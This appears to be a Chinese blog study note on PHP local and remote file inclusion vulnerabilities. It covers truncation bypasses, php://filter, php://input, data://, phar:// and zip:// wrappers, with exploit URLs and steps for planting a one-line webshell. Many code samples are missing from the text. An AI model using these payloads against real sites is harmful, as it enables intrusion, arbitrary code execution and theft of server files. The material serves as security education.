今天学习了一波文件包含漏洞

介绍

服务器执行PHP文件时，可以通过文件包含函数加载另一个文件中的PHP代码，并且当PHP来执行，这会为开发者节省大量的时间。这意味着您可以创建供所有网页引用的标准页眉或菜单文件。当页眉需要更新时，您只更新一个包含文件就可以了，或者当您向网站添加一张新页面时，仅仅需要修改一下菜单文件（而不是更新所有网页中的链接）。

php文件包含漏洞

PHP中的文件包含分为本地包含与远程包含，导致文件包含的函数如下：

• • include()
  • include_once()
  • require()
  • require_once()
  • fopen()
  • readfile()
    …

本地包含漏洞（LFI）

新建一个phpinfo.txt，然后新建一个shell.php，写入：

1 
     

　访问shell.php会输出phpinfo页面内容，无论将扩展名改为什么，都将以php代码执行。如果文件不是符合php规则的（即没有写<?php ?>等），则通过include可以直接输出源码。

有限制本地文件包含漏洞绕过

%00截断

条件：magic_quotes_gpc = Off php版本<5.3.4

测试代码：

 

测试结果：

http://www.ctfs-wiki.com/FI/FI.php?filename=../../../../../../../boot.ini%00

路径长度截断

条件：windows OS，点号需要长于256；linux OS 长于4096

Windows下目录最大长度为256字节，超出的部分会被丢弃；

Linux下目录最大长度为4096字节，超出的部分会被丢弃。

测试代码：

1 
     

 

EXP:

1 http://www.ctfs-wiki.com/FI/FI.php?filename=test.txt/./././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././/././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././/././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././/././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././/./././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././

 

点号截断

条件：windows OS，点号需要长于256

测试代码：

1 
     

EXP:

http://www.ctfs-wiki.com/FI/FI.php?filename=test.txt.................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

 

远程包含漏洞

前提：需要开启allow_url_fopen，默认关闭。

新建php.txt:

1 
     

新建index.php:

访问http://www.xxxx.com/page=http://www.xxxx.com/php.txt执行结果将输出hello world。

有限制远程文件包含漏洞绕过

测试代码：

 

代码中多添加了html后缀，导致远程包含的文件也会多一个html后缀。

问号绕过

1 http://www.ctfs-wiki.com/FI/WFI.php?filename=http://192.168.91.133/FI/php.txt?

 

#号绕过

http://www.ctfs-wiki.com/FI/WFI.php?filename=http://192.168.91.133/FI/php.txt%23

 

　　

PHP伪协议

PHP 带有很多内置 URL 风格的封装协议，可用于类似 fopen()、 copy()、 file_exists() 和 filesize() 的文件系统函数。 除了这些封装协议，还能通过 stream_wrapper_register() 来注册自定义的封装协议。

目录

php:// 输入输出流

PHP 提供了一些杂项输入/输出（IO）流，允许访问 PHP 的输入输出流、标准输入输出和错误描述符， 内存中、磁盘备份的临时文件流以及可以操作其他读取写入文件资源的过滤器。

php://filter（本地磁盘文件进行读取）

元封装器，设计用于”数据流打开”时的”筛选过滤”应用，对本地磁盘文件进行读写。

用法：?filename=php://filter/convert.base64-encode/resource=xxx.php ?filename=php://filter/read=convert.base64-encode/resource=xxx.php 一样。

条件：只是读取，需要开启 allow_url_fopen，不需要开启 allow_url_include；

测试代码：

 

php://input

可以访问请求的原始数据的只读流。即可以直接读取到POST上没有经过解析的原始数据。 enctype=”multipart/form-data” 的时候 php://input 是无效的。

用法：?file=php://input 数据利用POST传过去。

php://input （读取POST数据）

碰到file_get_contents()就要想到用php://input绕过，因为php伪协议也是可以利用http协议的，即可以使用POST方式传数据，具体函数意义下一项；

测试代码：

 

测试结果：

php://input（写入木马）

测试代码：

1 
     

 

条件：php配置文件中需同时开启 allow_url_fopen 和 allow_url_include（PHP < 5.3.0）,就可以造成任意代码执行，在这可以理解成远程文件包含漏洞（RFI），即POST过去PHP代码，即可执行。

如果POST的数据是执行写入一句话木马的PHP代码，就会在当前目录下写入一个木马。

    ');?>

测试结果：

如果不开启allow_url_include会报错：

php://input（命令执行）

测试代码：

1 
     

 

条件：php配置文件中需同时开启 allow_url_fopen 和 allow_url_include（PHP < 5.30）,就可以造成任意代码执行，在这可以理解成远程文件包含漏洞（RFI），即POST过去PHP代码，即可执行；

如果不开启allow_url_include会报错：

file://伪协议 （读取文件内容）

通过file协议可以访问本地文件系统，读取到文件的内容

测试代码：

 

data://伪协议

数据流封装器，和php://相似都是利用了流的概念，将原本的include的文件流重定向到了用户可控制的输入流中，简单来说就是执行文件的包含方法包含了你的输入流，通过你输入payload来实现目的； data://text/plain;base64,dGhlIHVzZXIgaXMgYWRtaW4

data://（读取文件）

和php伪协议的input类似，碰到file_get_contents()来用； <?php // 打印 “I love PHP” echo file_get_contents(‘data://text/plain;base64,SSBsb3ZlIFBIUAo=’); ?>

注意：<span style="color: rgb(121, 121, 121);"><?php phpinfo();,这类执行代码最后没有?></span>闭合;

如果php.ini里的allow_url_include=On（PHP < 5.3.0）,就可以造成任意代码执行，同理在这就可以理解成远程文件包含漏洞（RFI） 测试代码：

 

phar://伪协议

这个参数是就是php解压缩包的一个函数，不管后缀是什么，都会当做压缩包来解压。

用法：?file=phar://压缩包/内部文件 phar://xxx.png/shell.php 注意： PHP > =5.3.0 压缩包需要是zip协议压缩，rar不行，将木马文件压缩后，改为其他任意格式的文件都可以正常使用。 步骤： 写一个一句话木马文件shell.php，然后用zip协议压缩为shell.zip，然后将后缀改为png等其他格式。 

测试代码：

 

zip://伪协议

zip伪协议和phar协议类似，但是用法不一样。

用法：?file=zip://[压缩文件绝对路径]#[压缩文件内的子文件名] zip://xxx.png#shell.php。

条件： PHP > =5.3.0，注意在windows下测试要5.3.0<PHP<5.4 才可以 #在浏览器中要编码为%23，否则浏览器默认不会传输特殊字符。

测试代码：

 

 

 

上边一些内容原文来自https://www.freebuf.com/articles/web/182280.html